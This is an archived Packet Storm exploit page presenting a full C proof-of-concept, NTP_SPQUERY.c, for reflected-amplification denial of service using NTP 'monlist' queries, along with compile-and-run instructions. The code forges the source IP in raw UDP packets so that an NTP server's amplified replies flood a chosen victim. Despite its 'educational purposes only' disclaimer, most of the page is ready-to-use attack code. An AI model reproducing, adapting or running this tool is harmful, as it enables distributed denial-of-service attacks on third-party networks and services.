what you don't know can hurt you

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
Posted Mar 19, 2014
Authored by Mark Osborne

NTP_SPQUERY.C is a spoofed "monlist query" program which can generate packets like those used in reflected amplification NTP attacks that were common in early 2014. Written entirely in C, it requires no special libs or header files. It has been designed to run on most LINUXs.

tags | exploit, denial of service, spoof, proof of concept
MD5 | b1b7e74fd45bd5a336855af010521b6e

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

Change Mirror Download
//   PROGRAM :   NTP_SPQUERY.c
//
// AUTHOR : loud-fat-bloke / MARK OSBORNE
//
// Description:
//
// REFLECTED AMPLIFICATION NTP ATTACK
//
// A well known security journal has asked me to do a piece on NTP ddos
// and being a bit reactionary (OCD in other words)
// I figured I would show that NTP and DNS DrdOS are related and conform to a common formulae.
// Therefore I have used the DNS_SPQUERY program I wrote 6 months ago to convert into NTP_SQUERY with minimal changes
//
// NTP_SPQUERY.C is an "monlist query" REFLECTED AMPLIFICATION NTP ATTACK that are common in March 2014
//
//
// As part of the charity project
// "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//
// I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
// 1 - that in europe a cyber attack by any group of proficient computer literate parties could cripple the infrastructure
// 2 - that formalised cyber security monitoring is required to prevent this - not militaristic, counter espionage initiatives
// which are hang overs from the cold ware
// 3 - Privacy campaigners generaly make things work by assuming "cyber security" monitoring fits into this
// espionage initiatives describes above
//
// charity project? - proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
// **** DO NO HARM WITH THIS PROGRAM *********
//
// the author has produced it for educational purposes only
//
//
/* to build and run me cut and paste the below 10 lines into your shell on a nice LINUX box
# compile me
#
gcc ntp_spquery.c -o ntp_spquery
#
# run me
# SPOOFED_S_IP NTP SERVER TARGET
./ntp_spquery 192.168.0.121 192.168.0.120
#
#
#
#
*/
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
int udpsockfd,n;

#define PROGRAM "NTP_SPQUERY"


//NTP header structure
struct NTP_HEADER
{
unsigned short id; // identification number

unsigned char li :2; //
unsigned char vn :3; //
unsigned char rb :1; //
unsigned char eb :1; //
unsigned char mb :1; //
unsigned char opcode :5;
unsigned char data[10] ; //
};

/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/

char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

unsigned char buf[4000];
int data_length ;

/*


# LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Define some constants.
#define IP4_HDRLEN 20 // IPv4 header length
#define UDP_HDRLEN 8 // UDP header length, excludes data

int
spoofudp (char *saddr,int sport, char *daddr, int dport, int datalen, char *udppacket)
{
int sd ;
const int on = 1;
struct ip iphdr, *iphdr_ptr;
struct udphdr udphdr, *udphdr_ptr;
unsigned char *data, *packet;
struct sockaddr_in sin;
unsigned char x[10000]; // the buffer
// Allocate memory for various headers and offsets.
packet = x ;
iphdr_ptr = x ;
// datalen = dnslength;
// UDP header ptr .
udphdr_ptr = (packet + IP4_HDRLEN);
// UDP data ptr .
data = (packet + IP4_HDRLEN + UDP_HDRLEN);
// UDP data -copy it at the end
memcpy (data , udppacket ,datalen );
// IPv4 header
iphdr_ptr->ip_hl =5;
iphdr_ptr->ip_v = 4;
iphdr_ptr->ip_tos = 0;
iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
iphdr_ptr->ip_id = htons (0);
iphdr_ptr->ip_off = htons (0);
iphdr_ptr->ip_ttl = 255;
iphdr_ptr->ip_p = IPPROTO_UDP;
iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );
iphdr_ptr->ip_src.s_addr = inet_addr (saddr ); /* SPOOOOPH di source IP */
iphdr_ptr->ip_sum = 0; //kernel do this please

// UDP header
udphdr_ptr->source = htons (sport);
udphdr_ptr->dest = htons (dport);
udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
udphdr_ptr->check = 0; // hey misterkernal do your job for me
// zero ise sockeet data.
memset (&sin, 0, sizeof (struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
// open a raw socket
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror ("socket() failed ");
exit (2);
}
// unless the socket is set with IP_HDRINCL a random IP datagram will go
// out on the wire nearly all Linux kernals allow many bsd sun aix and hp dont
if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
perror ("setsockopt() failed to set IP_HDRINCL ");
exit (3);
}
// Send packet.
if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) {
perror ("sendto() failed ");
exit (EXIT_FAILURE);
}
// Close socket descriptor.
close (sd);
}


usage ()
{
fprintf(stderr,"Program Usage: \n %s SOURCE_DOT_ADDR DEST_DOT_ADDR \n\n", PROGRAM);
exit(1);
}

unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0 ;
int pants;

int
main( int argc , char *argv[])
{
char *out_temp;
if ( argc != 3 )
usage();
/* */ printf(pretyy ) ;
/* */ printf(pretyz ) ;
printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t %s \n \n \n ", argv[1] ,
argv[2] );
//
memset(buf,0x00,0xfF);
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

data_length = 9 ;
printf(pretty ) ;
//
//
// my pretty
for (pants=0; pants < 30 ; pants++ )
printf("%x ", buf[pants]);
//

printf("\nNTP PACKET len \t \t %i \n" , data_length ) ;
//
// Writes out a spoofed UDP Packet
// written for my rfc 2827 survey which never got finished
//
spoofudp (argv[1] ,4950, argv[2] , 123 , data_length, buf );

return 0;
}
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    15 Files
  • 4
    Jun 4th
    25 Files
  • 5
    Jun 5th
    8 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close